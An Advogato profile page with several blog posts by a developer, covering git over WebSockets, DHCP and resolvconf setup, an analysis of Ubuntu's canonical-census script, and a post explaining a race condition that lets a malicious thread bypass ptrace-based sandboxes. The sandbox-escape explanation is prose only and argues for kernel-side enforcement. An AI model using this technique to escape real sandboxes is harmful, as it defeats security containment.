StephanPeijnik is currently certified at Journeyer level.

Name: Stephan Peijnik
Member since: 2006-08-25 13:03:42
Last Login: 2010-08-25 12:30:48

FOAF RDF Share This

Homepage: http://www.sp.or.at/

Notes:

Studies:
CS student at Graz University of Technology, Austria.

Work:
Part-time developer for a nameless Internet company, working with but sadly not on Free Software.

Free Software relationship:
Has been using Free Software since the beginning of 2000 and has become more active in the community in 2005/2006.
Learned programming by modifying Free Software projects to see what his changes do.

Personal bits:
Has made developing software one of his hobbies.
Is fluent in German, English, C and Python.

Projects

Recent blog entries by StephanPeijnik

Syndication: RSS 2.0
5 Jun 2012 (updated 5 Jun 2012 at 09:13 UTC) »

git smart protocol via WebSockets - proof of concept

Yesterday an idea came to my mind: let's try running git's smart transport protocol via a WebSocket. In a few hours of work I came up with a solution which works.

But why would one want to do that? Basically the only options for running git's smart protocol you have right now is either using git's own protocol or tunneling it via ssh. The first option leaves you without any ways of authentication - so it's only usable for read-only access to public repositories. The second option involves using an ssh server, which then allows read-write access and authentication, but is quite some work to set up.
As I am working on a university assignment which involves using WebSockets right now it occurred to me that there is no reason for not using WebSockets for this.

The main idea is providing a tunnel, just like the ssh transport does, but this time via a WebSocket. The logic is the same and there is no modification to git itself required.
For now I have only implemented a proof of concept which allows you to update your repository from a remote system, but the approach should work perfectly well for pushing your changes to a remote repository too.

Let's have a look at how this works.
On the local system git-fetch-pack is invoked, which talks to a git-upload-pack process on the remote end. The code I wrote provides a script which acts like an ssh client, but creates a WebSocket connection to the remote end, using Python and the websocket-client Python package. On the other side of the tunnel a simple Python WSGI application, which uses gevent-websocket, provides the server-side implementation.
Now when a WebSocket connection is established the server spawns a git-upload-pack process and redirects its stdout to the WebSocket. Data which is received over the WebSocket is sent to the git-upload-pack's stdin file descriptor.
On the client this logic is reversed, redirecting its stdout to the WebSocket and sending data received over the WebSocket to its stdin file descriptor.

That's about it. Keep in mind this is a proof-of-concept, so there may be rough edges here and there and both stability and performance may be "sub-optimal".
I'd also like to point out that using WebSockets and HTTP as the underlying transport protocol gives one the opportunity to use standard HTTP(s) authentication mechanisms. This means that the WebSocket approach could be useful to git hosting sites, basically removing the need for running an ssh server.

You can find the Python code over at https://github.com/speijnik/gitws. Have fun giving it a try.

Syndicated 2012-06-05 06:08:00 (Updated 2012-06-05 09:13:30) from Stephan Peijnik

ptrace-based security just does not work

In 2009 I wrote about building a ptrace-based sandboxing system named "ujail", including some basic proof of concepts.

I have been thinking about this idea for a long time now, but sadly did not have the time to implement it - until now.
Right now I am working on this idea again and whilst doing some research I came across a thread on the linux-kernel mailing list.
At first a problem with 64-bit binaries trapping into 32-bit syscall handling code via int 80 got me there. While this is awkward and keeps one from implementing a sandbox in userspace (due to not being able to access TS_COMPAT, as described in the thread) it led me to something else - a more severe problem.
Unfortunately I cannot remember who wrote this and am unable to recover the actual mail (if someone finds it I would be happy if you notified me), but someone mentioned race conditions when using ptrace as a security measure.

In short I came up with a proof of concept which works around possible limitations imposed by a ptrace-based security mechanism. For those in a hurry: you can find the code of the proof of concept at github.
In the following parts of this article I would like to elaborate on the problem and how the proof of concept code exploits it.

The problem here is the fact that PTRACE_SYSCALL traps before the kernel actually fetches information from userspace.
Let me illustrate that with sys_open. Assume we are running a tracer which makes use of ptrace to get a SIGTRAP each time a tracee invokes a syscall and we want to impose limits on sys_open calls.

After a syscall has been invoked it would roughly work like this:

The tracer is notified, evaluates the registers as read using PTRACE_GETREGS and reads the first syscall argument's value (namely the path value) from the tracee. It then evaluates the value and decides whether to allow the syscall or not.
Now this is exactly the way ujail would have worked in its initial design. However, using this method there is a not-so-small attack vector which involves all values read from the tracee's memory.

You may now ask yourself what I am writing about, but it will make sense in a few moments, I promise.

There is a timespan between the tracer reading the path value from tracee's memory and the tracer actually resuming the tracee using PTRACE_SYSCALL which allows a potentially malicious thread inside the tracee to change the value of the memory path points to and thus circumvent any restriction imposed by the tracer. Changing the value is as simple as writing to the process memory, which is shared between threads, at just the right moment and to just the right position.
As writing to memory will not generate a trap the tracer could act upon the tracer would be unaware of the modification and it is just about to resume the tracee's execution - jail broken.

What is important here is just the right timing. The write has to happen after the tracer has read from the tracee's memory and before it resumes execution of the tracee. However, the tracer is most likely to employ some kind of decision-finding process here. This process will take time. It may actually involve some syscalls (think mutexes, semaphores and condition variables here). All in all enough time to swap values.

You may now think to yourself that it might be really hard to actually pull this one off and it probably is in normal circumstances. However, the possibility to do this alone should rule-out ptrace as a security measure completely.

The only way I believe this could be handled is triggering a hook inside the system call handlers themselves, just after all information has been pulled from userspace. These values are guaranteed not to be modifiable from within userspace and thus only these should be considered for making decisions. As a consequence ujail (and every other similar security measure out there) will have to be realized at least partly in kernel-space.

Feel free to leave comments, send me an email and/or point out any issues with the proof of concept code or my idea.

Syndicated 2012-02-24 15:48:00 from Stephan Peijnik

How to force a local DNS resolver to be used using resolvconf

I know it has been a while, but after reading a blog post by Anand Kumria over at planet.debian.org I decided to have a quick look at one of the problems he described.

Basically, Anand wants to force the local resolver to be used for each and every network connection, may that connection be established manually or via NetworkManager. He wrote that fixing this configuration for every new connection manually is tedious, and I fully agree on that. So here is a solution to do this all automatically, using resolvconf:

After installing the resolvconf package every time /etc/resolv.conf is to be updated resolvconf takes care of that. Using the files in /etc/resolvconf this process can be controlled and the resulting file modified to fit one own's needs.

So at first we would like the local resolver to be used for every connection. This works by simply adding the "nameserver 127.0.0.1" directive to the /etc/resolvconf/resolv.conf.d/head file. Simple as that. Every time /etc/resolv.conf gets generated the contents of the head file are actually used as /etc/resolv.conf's header.

Using this method the local resolver is used for every connection. But Anand wanted to use only the local resolver and discard any resolvers possibly obtained via DHCP for example. Guess what, this is also possible using resolvconf.

Adding TRUNCATE_NAMESERVER_LIST_AFTER_127="yes" to /etc/default/resolvconf does exactly that. Now every nameserver directive after the 127.0.0.1 one is ignored and will not make it into /etc/resolv.conf. You can of course add more nameservers to the head file above the 127.0.0.1 directive.

Problem fixed I guess.
Don't forget to re-connect to the network or manually force re-creation of /etc/resolv.conf so the changes you made get populated. I really hope this is of use to some of you facing similar problems.

Syndicated 2011-06-01 19:53:00 (Updated 2011-06-01 19:53:24) from sp

ISC dhcpd and IP assignments from a pool to specific hosts only

Assigning an IP address statically to a host with a given MAC address using ISC dhcpd is quite trivial, one host entry, a hardware ethernet entry and a fixed-address entry and you are up and running.
But what if you want to assign IP addresses from a pool to only a few hosts with specific MAC addresses?

Before you ask yourself why someone might want to do that, have a look at my (very real) use-case.
I am currently working on setting up an installation server for my employer, ANEXIA Internetdienstleistungs GmbH. The server itself uses PXE, TFTP and FAI for installing systems. To be able to do PXE booting one has to set up an DHCP server to provide configuration details, like the TFTP Server Address and the boot filename.

Now what one should consider is that this system is designed to provide automatic installations for internet-facing hosts, namely ones in public IP networks. Running a DHCP server in such a network is not a good idea. We neither want to dish out configurations to each and every hosts that asks for them, neither do not want to do a PXE boot each and every time one of our systems is restarted. Now the combination of FAI and pxelinux allows for default configurations which force local booting, but this still causes the (re-)boot time for those systems to increase and potentially also increases the load on the TFTP server. Also, let's not even consider thinking about whether this setup is "clean" or not. I personally believe that dishing out IP addresses in a public IP network is a bad thing(tm) and I guess a lot of people will be nodding when reading these lines.

What I was asking myself is how to get something like that set up in a cleaner way, and guess what, I found a solution.
The basic idea behind this is only providing IP configuration via DHCP to a specific set of hosts (with a specific set of MAC addresses) and not providing any information to all other hosts. The specific set of hosts are those that we want to do an install run on. This is a no-brainer and I guess the right way to do that, but implementing this approach is not as straight-forward as I initially thought.

Actually the implementation of that idea caused me a bit of a headache and cost me a few work-hours to get right, that's why I'd like to share the configuration details with you.



Let's have a look at how to get such a setup using ISC dhcpd. We are using the fact that ISC dhcpd allows you to not only configure a subnet, but rather also pools inside subnets, which can have allow and deny rules. Such rules can be in the form of "allow/deny member of ", where classes (and subclasses, keep on reading for details) can be defined inside the configuration file as well.

What we first did was creating a subnet with a pool declaration, as follows:

subnet 10.0.0.0 netmask 255.255.255.0 {  
    option routers 10.0.0.254;
    option broadcast-address 10.0.0.255;
    filename "fai/pxelinux.0";
    next-server 10.0.0.254;
    server-name "10.0.0.254";
    pool { 
      allow members of "install"; 
      range 10.0.0.10 10.0.0.230; 
   }
}
This one configures the subnet 10.0.0.0/24, with 10.0.0.254 being the network gateway, 10.0.0.254 being the TFTP server and "fai/pxelinux.0" being the TFTP filename. Additionally pool allows us to define a range of IP addresses we want to use, along with a line stating that only members of the "install" class should get a network configuration. If you do not have any other subnet defined in your config and a client that is not in this "install" class asks for an IP address you will see something like this in your syslog:  "dhcpd: DHCPDISCOVER from 11:22:33:44:55:66 via eth1: network 10.0.0/24: no free leases". dhcpd will not even answer these requests and thus the client will not even know that there is a DHCP server running here. Exactly what we wanted.

I wrote about this giving me a headache, but so far things have been pretty straight-forward. Getting this far did not take very long, believe me.

Next thing we did was defining that "install" class as follows:

class "install" { match hardware; }
Again, not very hard to do. This tells dhcpd to look for subclasses of "install" with a matching hardware-address. So let's have a look at the subclass for, let's say the host with MAC address "11:22:33:44:55:66":

subclass "install" 1:11:22:33:44:55:66;
I intentionally highlighted the leading "1:" there. This means nothing more or less than "ethernet". Without that leading "1:" you won't get anywhere. Matching will fail, simple as that. It took me a while to find  information about this in "man 5 dhcp-eval". Quoting parts of the interesting section:

The hardware operator returns a data string whose first  element  is
the  type of network interface indicated in packet being considered,
and whose subsequent elements are client’s link-layer address. [...] Hardware types include  ethernet  (1),  token-ring  (6), and fddi (8).
 Now, with the combination of the subnet, pool, class and subclass directives we could get the setup we wanted: a DHCP server only providing IP configuration to a specific set of hosts and ignoring all other DHCP requests.

If you have any comments about this setup or ideas on how to get something similar set-up using another approach feel free to leave a comment.

Personal final note: accidentally typing 80 instead of 08 in a MAC address will cost you an additional two hours and will even have you re-compile ISC dhcpd with eval debugging turned on, believe me. :-)

Syndicated 2011-01-01 22:01:00 (Updated 2011-01-01 22:02:38) from sp

What's all the fuzz about canonical-census?

I know I have not updated this blog in quite a long time now, but something caught my attention today: canonical-census.

As slashdot.org reports Canonical begins with tracking their (OEM) installations. Now it's obvious that people are uncomfortable with a program running on their system which phones back to their OS vendor, that's why I have had a quick look at what exactly canonical-census does.

Firstly however, I would like to point out that the report on slashdot.org is very clear about which information is being gathered, being "the number of times this system previously sent to Canonical [...], the Ubuntu distributor channel, the product name as acquired by the system's DMI information, and which Ubuntu release is being used". And it's perfectly correct. After getting the canonical-census Debian source package (using dget -u https://launchpad.net/ubuntu/+archive/partner/+files/canonical-census_0.1.dsc) the source package shows, besides the Debian packaging information, two scripts:

  • census (written in Python) and
  • send-census (a GNU bash script).
Now what do those scripts actually do?

send-census is installed in /etc/cron.daily, which means it will be executed once a day by the system's cron daemon. It's a mere 48 lines long, and its code is quite simple. So everyone with at least some shell scripting experience can easily check what it's doing. Now guess what, it sends exactly the information as reported on slashdot to Canonical. Nothing more and nothing less.

Technically it keeps a plain text file containing a single number as its call-counter, residing in /var/lib/send-install-count/counter and uses an on my Ubuntu Lucid system nonexistent /var/lib/ubuntu_dist_channel file for getting information about the distribution channel.
The above mentioned "system's DMI information" is not the whole bunch of DMI information available, but only the contents of /sys/class/dmi/id/product_name, which strangely enough returns "System Product Name" on my machine. Last but not least it uses lsb-release to get the distribution release (ie. 10.04 for my system).

Now those four pieces of information are sent to http://census.canonical.com/submit via a simple HTTP GET query, using wget. The full URL with all the parameters added is:
http://census.canonical.com/submit?count=count&dcd=dist_channel&product=dmi_product_name&release=ubuntu_release_version

The second script, census, is the part working on Canonical's script. Basically census reads in their Apache's access log file and creates an SQLite database from the contents of the log file. With 391 lines this script is a bit longer, but it does not end up in the Debian package at all.

Personally I do not see how Canonical or one of their partners could possibly do anything harmful with that information. Comparing this to Debian's popcon reveals that Debian is gathering a lot more information.

Now there are two more things one should consider: census is targeted at OEMs, which means its unlikely that it will end up on each and every Ubuntu installation and can be uninstalled by removing the canonical-census package with your favorite package manager.

Finally, think about this for a second: It's a shell script you can always examine. There is no hidden magic and it's a plain HTTP request the script is sending. No evil things happening there.
And now compare that to what other (often proprietary) software vendors do and how much data they submit, possibly even in encrypted form so you do not know for sure what is being sent to them.

Personally I welcome the openness of Canonical with providing their users with the package's code this early and being straight about what information it submits. They could have silently added it to those installations after all...

Happy hacking!

Syndicated 2010-08-10 12:07:00 (Updated 2010-08-10 12:07:35) from sp

29 older entries...

 

StephanPeijnik certified others as follows:

  • StephanPeijnik certified StephanPeijnik as Journeyer
  • StephanPeijnik certified rms as Master
  • StephanPeijnik certified jemarch as Journeyer
  • StephanPeijnik certified werner as Master
  • StephanPeijnik certified jonas as Master
  • StephanPeijnik certified greve as Master
  • StephanPeijnik certified brett as Journeyer
  • StephanPeijnik certified mattl as Journeyer
  • StephanPeijnik certified karlberry as Master

Others have certified StephanPeijnik as follows:

  • StephanPeijnik certified StephanPeijnik as Journeyer
  • jemarch certified StephanPeijnik as Journeyer
  • mattl certified StephanPeijnik as Journeyer

[ Certification disabled because you're not logged in. ]

New Advogato Features

New HTML Parser: The long-awaited libxml2 based HTML parser code is live. It needs further work but already handles most markup better than the original parser.

Keep up with the latest Advogato features by reading the Advogato status blog.

If you're a C programmer with some spare time, take a look at the mod_virgule project page and help us with one of the tasks on the ToDo list!

X
Share this page